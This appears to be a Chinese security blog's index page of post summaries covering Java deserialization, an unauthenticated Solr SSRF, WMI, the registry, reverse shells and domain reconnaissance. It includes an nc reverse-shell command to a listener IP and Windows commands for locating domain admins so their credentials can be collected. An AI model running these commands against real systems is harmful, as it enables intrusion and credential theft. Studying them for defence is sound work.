g0udan

摘要： task2 回归 找到一个Function，通过这个Function预测出一个数值，如根据股票走势预测明天的股票情况，根据宝可梦的属性预测它的CP值 2.1 线性模型： input x: featrue w: weight b: bias 2.2 损失函数(Loss Function) 损失函数的作 阅读全文

摘要： URLDNS利用链分析 1.原理阐述 HashMap会对key进行hash计算获取hashCode，而URL类中的hashCode属性在特殊情况下（hashCode==1）的hashCode计算将触发dns查询 2.代码分析 ysoserial中的URLDNS.java @Dependencies( 阅读全文

摘要： Java反序列化基础 1.扫盲 常用单词 source：入口，gadget chain：调用链，sink：目标方法，RMI：remote method invocation远程方法调用 反序列化漏洞的理解 反序列化漏洞的挖掘，本质上就是已知source和sink，如何走通整个流程的问题 这里sour 阅读全文

摘要： Web路由 <!-- framework\webtools\webapp\webtools\WEB-INF\web.xml --><servlet> <description>Main Control Servlet</description> <display-name>ControlServle 阅读全文

摘要： 漏洞描述 solr默认安装未开启身份验证，攻击者可未授权通过config api修改配置，导致ssrf和任意文件读取。 漏洞分析 SSRF 漏洞代码块 https://github.com/apache/solr/blob/main/solr/core/src/java/org/apache/sol 阅读全文

摘要： Windows管理设施 Windows管理设施（WMI Windows Management Instrumentation）是windows 03/xp开始，Windows内置的一个系统工具，用来方便管理员远程管理Windows主机。Windows程序和脚本可以使用WMI COM API与WMI交 阅读全文

摘要： 概念 注册表是一个系统定义的数据库，应用程序和系统组件在其中存储和检索配置数据。在注册表中存储的数据根据Microsoft Windows版本不同而不同。应用程序使用注册表API来检索、修改或删除注册表数据。 5个根键 根键 说明 HKEY_CURRENT_USER 包含当前登录的用户的配置信息的根 阅读全文

摘要： 反弹shell常用命令及分析 1.利用nc反弹shell 一般情况下 服务端：nc 192.168.247.1 8888 -e /bin/sh vps：nc lvp 8888 nc参数说明 -e program to exec after connect，程序重定向 -l listen mode，使 阅读全文

摘要： 参考书籍《内网安全攻防》.徐焱 贾晓璐 著 如有侵权，请联系，立删 查找域管理进程 在获取了管理员权限的系统中寻找域管理员登录进程，进而收集域管理员的凭据 本机检查 1.获取域管理员列表 net group "Domain Admins" /domain 2.列出本机的所有进程及进程用户 taskl 阅读全文

摘要： 参考书籍《内网安全攻防》.徐焱 贾晓璐 著 如有侵权，请联系，立删 收集域内基础信息 需要域用户或system权限 1.查询域 net view /domain 需要关闭防火墙执行 2.查询域内所有计算机 net view /domain:GOD //GOD为查询到的域 根据实际修改 3.查询域内所 阅读全文